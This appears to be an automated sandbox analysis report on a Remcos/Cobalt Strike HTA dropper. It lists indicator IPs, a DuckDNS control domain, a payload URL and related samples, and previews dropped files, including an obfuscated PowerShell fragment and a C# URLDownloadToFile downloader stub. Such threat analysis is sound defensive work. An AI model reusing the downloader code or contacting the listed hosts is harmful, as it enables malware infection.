                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                              TimeTypeDescription
                                                                                                              01:14:56API Interceptor123x Sleep call for process: powershell.exe modified
                                                                                                              01:16:07API Interceptor3865416x Sleep call for process: CasPol.exe modified
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              107.173.143.31clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                192.3.122.159clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                • 192.3.122.159/121/simplegreatfeatureswithnicespeakingthingsentirelifegoingon.tIF
                                                                                                                178.237.33.50clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                • geoplugin.net/json.gp
                                                                                                                7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                                                                                • geoplugin.net/json.gp
                                                                                                                PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                                • geoplugin.net/json.gp
                                                                                                                requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                • geoplugin.net/json.gp
                                                                                                                Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                • geoplugin.net/json.gp
                                                                                                                x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                                                                • geoplugin.net/json.gp
                                                                                                                7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                • geoplugin.net/json.gp
                                                                                                                greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                • geoplugin.net/json.gp
                                                                                                                SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                                                                                • geoplugin.net/json.gp
                                                                                                                WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                                                                • geoplugin.net/json.gp
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                paste.eeclearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                • 172.67.187.200
                                                                                                                PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                                • 104.21.84.67
                                                                                                                NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                                                • 188.114.96.6
                                                                                                                greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                • 104.21.84.67
                                                                                                                goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                • 172.67.187.200
                                                                                                                creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                • 104.21.84.67
                                                                                                                Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                                • 188.114.97.6
                                                                                                                SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                • 188.114.97.6
                                                                                                                Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                                • 188.114.96.6
                                                                                                                print preview.jsGet hashmaliciousFormBookBrowse
                                                                                                                • 172.67.187.200
                                                                                                                geoplugin.netclearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                • 178.237.33.50
                                                                                                                7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                                                                                • 178.237.33.50
                                                                                                                PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                                • 178.237.33.50
                                                                                                                requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                • 178.237.33.50
                                                                                                                Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                • 178.237.33.50
                                                                                                                x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                                                                • 178.237.33.50
                                                                                                                7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                • 178.237.33.50
                                                                                                                greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                • 178.237.33.50
                                                                                                                SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                                                                                • 178.237.33.50
                                                                                                                WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                                                                • 178.237.33.50
                                                                                                                kelexrmcadmnnccupdated.duckdns.orgclearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                • 107.173.143.31
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                AS-COLOCROSSINGUSclearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                • 192.3.122.159
                                                                                                                sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 107.172.24.189
                                                                                                                requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                • 198.23.227.212
                                                                                                                NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                                                • 23.95.235.29
                                                                                                                jOlYP2b2P4.elfGet hashmaliciousXmrigBrowse
                                                                                                                • 107.172.43.186
                                                                                                                smb.ps1Get hashmaliciousXmrigBrowse
                                                                                                                • 107.172.43.186
                                                                                                                AI7f43Z7AC.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 107.172.88.151
                                                                                                                3S52TCXLd6.exeGet hashmaliciousXmrigBrowse
                                                                                                                • 107.172.43.186
                                                                                                                job.ps1Get hashmaliciousDcRat, StormKitty, VenomRATBrowse
                                                                                                                • 5.252.235.172
                                                                                                                job.ps1Get hashmaliciousDcRat, StormKitty, VenomRATBrowse
                                                                                                                • 5.252.235.172
                                                                                                                AS-COLOCROSSINGUSclearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                • 192.3.122.159
                                                                                                                sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 107.172.24.189
                                                                                                                requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                • 198.23.227.212
                                                                                                                NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                                                • 23.95.235.29
                                                                                                                jOlYP2b2P4.elfGet hashmaliciousXmrigBrowse
                                                                                                                • 107.172.43.186
                                                                                                                smb.ps1Get hashmaliciousXmrigBrowse
                                                                                                                • 107.172.43.186
                                                                                                                AI7f43Z7AC.exeGet hashmaliciousUnknownBrowse
                                                                                                                • 107.172.88.151
                                                                                                                3S52TCXLd6.exeGet hashmaliciousXmrigBrowse
                                                                                                                • 107.172.43.186
                                                                                                                job.ps1Get hashmaliciousDcRat, StormKitty, VenomRATBrowse
                                                                                                                • 5.252.235.172
                                                                                                                job.ps1Get hashmaliciousDcRat, StormKitty, VenomRATBrowse
                                                                                                                • 5.252.235.172
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                3b5074b1b5d032e5620f69f9f700ff0eclearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                • 104.21.84.67
                                                                                                                c2.htaGet hashmaliciousXWormBrowse
                                                                                                                • 104.21.84.67
                                                                                                                file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                                                                                                                • 104.21.84.67
                                                                                                                SWIFT09181-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                • 104.21.84.67
                                                                                                                TD2HjoogPx.dllGet hashmaliciousUnknownBrowse
                                                                                                                • 104.21.84.67
                                                                                                                wmdqEYgW2i.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                • 104.21.84.67
                                                                                                                LaRHzSijsq.exeGet hashmaliciousDCRatBrowse
                                                                                                                • 104.21.84.67
                                                                                                                Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                • 104.21.84.67
                                                                                                                Whatsapp-GUI.exeGet hashmaliciousDarkGate, MailPassViewBrowse
                                                                                                                • 104.21.84.67
                                                                                                                RdLfpZY5A9.exeGet hashmalicious77Rootkit, XWormBrowse
                                                                                                                • 104.21.84.67
                                                                                                                No context
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                File Type:JSON data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):963
                                                                                                                Entropy (8bit):5.018384957371898
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
                                                                                                                MD5:C9BB4D5FD5C8A01D20EBF8334B62AE54
                                                                                                                SHA1:D38895F4CBB44CB10B6512A19034F14A2FC40359
                                                                                                                SHA-256:767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
                                                                                                                SHA-512:2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
                                                                                                                Malicious:false
                                                                                                                Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (3315), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):154110
                                                                                                                Entropy (8bit):3.799082402432702
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:p+SH9rw84JFFSOKuW5kYOGto+SH9rw84JFFSOKuW5kYOr+SH9rw84JFFSOKuW5kq:/1457SzOGtM1457SzOF1457SzO4
                                                                                                                MD5:86DB247A20761FD6B7EF9EF0B3151DD1
                                                                                                                SHA1:FBD741B0283BAB0DDD1AE638FFA4DB3732E18211
                                                                                                                SHA-256:D1932467C3580FF9A99F7A9A6408D2C050A4DDDE46CCE7105E557A230080117C
                                                                                                                SHA-512:EE894328D447C348C7F8288B07EE9C668FD3AD4951F0B64443C7B5D62B41E6DA24389D8DF9799BDBA30620279C11CA55C0658722F97240480C540B3FCF2ED866
                                                                                                                Malicious:false
                                                                                                                Preview:...... . . . .....n.a.L.k.b.i.G.i.W.i.B.Z.f.k.z. .=. .".K.h.L.L.Z.i.x.h.i.i.L.f.G.G.A.".....i.W.U.T.e.W.W.G.d.Q.W.W.L.L.h. .=. .".L.s.U.c.k.p.b.L.L.m.U.d.p.b.n.".....c.j.G.e.o.W.h.K.P.U.a.Z.v.W.i. .=. .".W.G.o.o.K.c.W.f.G.W.h.n.p.z.N.".........o.U.c.G.K.P.a.a.o.G.G.a.N.u.K. .=. .".h.b.z.k.i.u.Z.L.e.f.b.a.R.z.k.".....z.p.T.z.G.m.Z.R.x.K.K.P.Q.d.P. .=. .".G.l.L.k.C.m.n.k.G.C.p.B.W.L.W.".....x.L.o.x.i.z.e.i.U.a.L.l.z.W.C. .=. .".G.c.x.K.B.W.i.k.A.e.k.m.G.C.o.".....n.R.G.G.K.i.G.A.P.N.U.i.a.c.f. .=. .".p.O.G.i.G.G.T.P.h.W.k.Z.T.i.L.".....W.u.b.G.q.h.P.i.L.K.c.K.q.v.T. .=. .".s.A.Z.c.l.s.P.d.h.i.k.i.W.s.H.".....W.S.W.W.p.l.W.G.c.G.N.K.g.e.f. .=. .".T.n.I.O.Z.L.c.i.z.f.U.x.R.q.z.".....U.Z.N.v.W.p.G.C.l.z.W.Q.l.W.H. .=. .".m.L.K.G.N.Q.G.h.Z.d.L.k.K.W.B.".....Z.i.m.i.W.G.K.W.q.i.e.H.Q.a.W. .=. .".L.z.W.q.Z.z.B.L.U.o.z.C.Q.n.k.".....K.p.c.O.N.m.h.W.I.n.m.G.x.t.Z. .=. .".k.L.N.N.p.A.o.z.m.z.P.p.z.p.q.".....P.G.a.R.u.C.K.q.W.m.i.k.L.n.L. .=. .".s.P.K.L.G.v.U.i.l.U.U.L.C.m.m.".....W.W.J.r.B.G.a.U.
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5829
                                                                                                                Entropy (8bit):4.901113710259376
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                                MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                                SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                                SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                                SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                                Malicious:false
                                                                                                                Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1144
                                                                                                                Entropy (8bit):5.290848674040258
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:32gSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NKM9r8Hd:GgSU4xymI4RfoUeW+mZ9tK8NF9u
                                                                                                                MD5:401E1D39FA1D53B1B16E95A7F25BC67A
                                                                                                                SHA1:06B6F24CDEA0923ECD7F85FF299C0DC20DF7F26C
                                                                                                                SHA-256:9CD66A79D880FE51E34B91D0730704CEF58F4C94ACB18B53E575C22A0651CC17
                                                                                                                SHA-512:DBA48F550BEAEBD49049BFB92A79AADC82822ECEEB7E0ED585DFC0E61A5F7E8FC9380DE4B273B422B868909A0EE049DD7E28DD89C73DEC8D8BCD024C28C0598B
                                                                                                                Malicious:false
                                                                                                                Preview:@...e...........................................................@...............(..o...B.Rb&............Microsoft.VisualBasic...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Mon Dec 16 08:04:26 2024, 1st section name ".debug$S"
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1336
                                                                                                                Entropy (8bit):3.9784700976618765
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24:H88m9pr5H4wKTFexmfwI+ycuZhN6DjakSdDsPNnqSSd:cTr5nKTAxmo1ul6Dja3dD8qSC
                                                                                                                MD5:E1DE0F3DC568A9CAC637F895DFCAAF97
                                                                                                                SHA1:BA6B4303ED52793ABB3BCAF4F2FB7522EFC5F8CE
                                                                                                                SHA-256:C6C0F1E19124F963D5AB34FCF5EC81417BCE87E4AFB485D340074A9711A5CF94
                                                                                                                SHA-512:822ED1D2C9FA20297F016DBAE22659F63BA40F7FB05BA9CAB223B2AA70608B70FA375B487E77CAAA23D8FE0BA169568305D20C98F92EA8B8720CECFF92198EEF
                                                                                                                Malicious:false
                                                                                                                Preview:L....._g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\brz1t20s\CSCB0966C08AE0149D5A4EAEA26C81DD572.TMP..................k..#..A.$...2.............5.......C:\Users\user\AppData\Local\Temp\RES6126.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.r.z.1.t.2.0.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                Category:dropped
                                                                                                                Size (bytes):15728640
                                                                                                                Entropy (8bit):0.10106922760070924
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                                                                                                MD5:8474A17101F6B908E85D4EF5495DEF3C
                                                                                                                SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                                                                                                SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                                                                                                SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                                                                                                Malicious:false
                                                                                                                Preview:..kb... ...................':...{........................R.....)....{.......{3.h.T.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...........................................{3....................k.....{3..........................#......h.T.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                File Type:MSVC .res
                                                                                                                Category:dropped
                                                                                                                Size (bytes):652
                                                                                                                Entropy (8bit):3.0975210093693684
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry8DEGak7YnqqdDEXPN5Dlq5J:+RI+ycuZhN6DjakSdDsPNnqX
                                                                                                                MD5:6BF0122399D3411D24BEA3A932CF14BE
                                                                                                                SHA1:5B9A5AA11213AC19B32107961B7D79648F6900B0
                                                                                                                SHA-256:8C4E219BD98BE03D5E05C44BD8856D6986772C5168512DC9A2CE9A5244B70446
                                                                                                                SHA-512:A5A47517E941BCC890D768EE83C197C4F027C1C69A112922F9D9A5DECE82A3AB51009A4EA524E227D0A31BA122B8E506345065EDC3A95301EC3E2D6B08B48854
                                                                                                                Malicious:false
                                                                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...b.r.z.1.t.2.0.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...b.r.z.1.t.2.0.s...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (356)
                                                                                                                Category:dropped
                                                                                                                Size (bytes):466
                                                                                                                Entropy (8bit):3.610741929956489
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:V/DsYLDS81zu99y3mMGl/pjQXReKJ8SRHy4HEsmQlAe/oM1bePQy:V/DTLDfu99OKOXfHgspV2Qy
                                                                                                                MD5:B7C397E8A98F83C3423F6574D154672F
                                                                                                                SHA1:C9031B00456EF3A66BA70C72B3425575E27CEB28
                                                                                                                SHA-256:FDF1BD81CCE7D5CEBA2D12973BFF373CA0D6C55687DA2C56B1D589CAAD8B8248
                                                                                                                SHA-512:C88EE138A371C5E00C2795B73BB1ED5053155181F77830BDF597AA68B065859D0E9BA64819E40601F7271F022B2D05DAA0ACBA552BD3F5040AE715A5606DD7C0
                                                                                                                Malicious:false
                                                                                                                Preview:.using System;.using System.Runtime.InteropServices;..namespace dEaO.{. public class zw. {. [DllImport("urLmon.dlL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr IDMkPnG,string Dlh,string tx,uint ST,IntPtr QAk);.. }..}.
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):371
                                                                                                                Entropy (8bit):5.231593625705727
                                                                                                                Encrypted:false
